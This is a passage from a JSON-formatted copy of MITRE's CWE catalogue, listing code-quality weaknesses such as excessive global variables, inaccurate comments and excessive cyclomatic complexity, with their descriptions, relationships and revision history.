difficult to understand and/or maintain the software due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1100":{"attr":{"@_ID":"1100","@_Name":"Insufficient Isolation of System-Dependent Functions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product or code does not isolate system-dependent\\n\\t\\t\\t\\t\\tfunctionality into separate standalone modules.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain and/or port the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1101":{"attr":{"@_ID":"1101","@_Name":"Reliance on Runtime Component in Generated Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses automatically-generated code that cannot be\\n\\t\\t\\t\\t\\texecuted without a specific runtime support component.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1102":{"attr":{"@_ID":"1102","@_Name":"Reliance on Machine-Dependent Data Representation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses a data representation that relies on low-level\\n\\t\\t\\t\\t\\tdata representation or constructs that may vary across different processors,\\n\\t\\t\\t\\t\\tphysical machines, OSes, or other physical components.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain and/or port the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1105","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1103":{"attr":{"@_ID":"1103","@_Name":"Use of Platform-Dependent Third Party Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product relies on third-party software components that do\\n\\t\\t\\t\\t\\tnot provide equivalent functionality across all desirable\\n\\t\\t\\t\\t\\tplatforms.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1104":{"attr":{"@_ID":"1104","@_Name":"Use of Unmaintained Third Party Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product relies on third-party components that are not\\n\\t\\t\\t\\t\\tactively supported or maintained by the original developer or a trusted proxy\\n\\t\\t\\t\\t\\tfor the original developer.","Extended_Description":{"xhtml:p":["Reliance on components that are no longer maintained can make it difficult or impossible to fix significant bugs, vulnerabilities, or quality issues. In effect, unmaintained code can become obsolete.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1105":{"attr":{"@_ID":"1105","@_Name":"Insufficient Encapsulation of Machine-Dependent Functionality","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product or code uses machine-dependent functionality, but\\n\\t\\t\\t\\t\\tit does not sufficiently encapsulate or isolate this functionality from\\n\\t\\t\\t\\t\\tthe rest of the code.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to port or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1106":{"attr":{"@_ID":"1106","@_Name":"Insufficient Use of Symbolic Constants","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses literal constants that may need to change\\n\\t\\t\\t\\t\\tor evolve over time, instead of using symbolic constants.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1107":{"attr":{"@_ID":"1107","@_Name":"Insufficient Isolation of Symbolic Constant Definitions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses symbolic constants, but it does not\\n\\t\\t\\t\\t\\tsufficiently place the definitions of these constants into a more centralized or\\n\\t\\t\\t\\t\\tisolated location.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1108":{"attr":{"@_ID":"1108","@_Name":"Excessive Reliance on Global Variables","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is structured in a way that relies too much on using\\n\\t\\t\\t\\t\\tor setting global variables throughout various points in the code, instead of\\n\\t\\t\\t\\t\\tpreserving the associated information in a narrower, more local\\n\\t\\t\\t\\t\\tcontext.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1109":{"attr":{"@_ID":"1109","@_Name":"Use of Same Variable for Multiple Purposes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a callable, block, or other code element in\\n\\t\\t\\t\\t\\twhich the same variable is used to control more than one unique task or store\\n\\t\\t\\t\\t\\tmore than one instance of data.","Extended_Description":{"xhtml:p":["Use of the same variable for multiple purposes can make it more difficult for a person to read or understand the code, potentially hiding other quality issues.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1110":{"attr":{"@_ID":"1110","@_Name":"Incomplete Design Documentation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s design documentation does not adequately describe\\n\\t\\t\\t\\t\\tcontrol flow, data flow, system initialization, relationships between tasks,\\n\\t\\t\\t\\t\\tcomponents, rationales, or other important aspects of the\\n\\t\\t\\t\\t\\tdesign.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1111":{"attr":{"@_ID":"1111","@_Name":"Incomplete I/O Documentation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s documentation does not adequately define inputs,\\n\\t\\t\\t\\t\\toutputs, or system/software interfaces.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1112":{"attr":{"@_ID":"1112","@_Name":"Incomplete Documentation of Program Execution","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The document does not fully define all mechanisms that are used\\n\\t\\t\\t\\t\\tto control or influence how product-specific programs are\\n\\t\\t\\t\\t\\texecuted.","Extended_Description":{"xhtml:p":"This includes environmental variables, configuration files, registry keys, command-line switches or options, or system settings."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1113":{"attr":{"@_ID":"1113","@_Name":"Inappropriate Comment Style","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses comment styles or formats that are\\n\\t\\t\\t\\t\\tinconsistent or do not follow expected standards for the\\n\\t\\t\\t\\t\\tproduct.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software due to insufficient legibility, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1114":{"attr":{"@_ID":"1114","@_Name":"Inappropriate Whitespace Style","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains whitespace that is inconsistent across\\n\\t\\t\\t\\t\\tthe code or does not follow expected standards for the\\n\\t\\t\\t\\t\\tproduct.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1115":{"attr":{"@_ID":"1115","@_Name":"Source Code Element without Standard Prologue","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains elements such as source files \\n\\t\\t\\t\\t\\tthat do not consistently provide a prologue or header that has been\\n\\t\\t\\t\\t\\tstandardized for the project.","Extended_Description":{"xhtml:p":["The lack of a prologue can make it more difficult to accurately and quickly understand the associated code. Standard prologues or headers may contain information such as module name, version number, author, date, purpose, function, assumptions, limitations, accuracy considerations, etc.","This issue makes it more difficult to maintain the software due to insufficient analyzability, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1116":{"attr":{"@_ID":"1116","@_Name":"Inaccurate Comments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains comments that do not accurately\\n\\t\\t\\t\\t\\tdescribe or explain aspects of the portion of the code with which the comment is\\n\\t\\t\\t\\t\\tassociated.","Extended_Description":{"xhtml:p":["When a comment does not accurately reflect the associated code elements, this can introduce confusion to a reviewer (due to inconsistencies) or make it more difficult and less efficient to validate that the code is implementing the intended behavior correctly.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1117":{"attr":{"@_ID":"1117","@_Name":"Callable with Insufficient Behavioral Summary","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a function or method whose signature and/or associated\\n\\t\\t\\t\\t\\tinline documentation does not sufficiently describe the callable\'s inputs, outputs,\\n\\t\\t\\t\\t\\tside effects, assumptions, or return codes.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1118":{"attr":{"@_ID":"1118","@_Name":"Insufficient Documentation of Error Handling Techniques","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The documentation does not sufficiently describe the techniques\\n\\t\\t\\t\\t\\tthat are used for error handling, exception processing, or similar\\n\\t\\t\\t\\t\\tmechanisms.","Extended_Description":{"xhtml:p":"Documentation may need to cover error handling techniques at multiple layers, such as module, executable, compilable code unit, or callable."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1119":{"attr":{"@_ID":"1119","@_Name":"Excessive Use of Unconditional Branching","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses too many unconditional branches (such as\\n\\t\\t\\t\\t\\t\\"goto\\").","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1120":{"attr":{"@_ID":"1120","@_Name":"Excessive Code Complexity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is too complex, as calculated using a well-defined,\\n\\t\\t\\t\\t\\tquantitative measure.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Maintainability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1121":{"attr":{"@_ID":"1121","@_Name":"Excessive McCabe Cyclomatic Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains McCabe cyclomatic complexity that exceeds a\\n\\tdesirable maximum.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-11"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-963"}},{"attr":{"@_External_Reference_ID":"REF-964"}},{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-11"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1122":{"attr":{"@_ID":"1122","@_Name":"Excessive Halstead Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is structured in a way that a Halstead complexity\\n\\t\\t\\t\\t\\tmeasure exceeds a desirable maximum.","Extended_Description":{"xhtml:p":["A variety of Halstead complexity measures exist, such as program vocabulary size or volume.","This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-963"}},{"attr":{"@_External_Reference_ID":"REF-965"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1123":{"attr":{"@_ID":"1123","@_Name":"Excessive Use of Self-Modifying Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses too much self-modifying\\n\\t\\t\\t\\t\\tcode.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1124":{"attr":{"@_ID":"1124","@_Name":"Excessively Deep 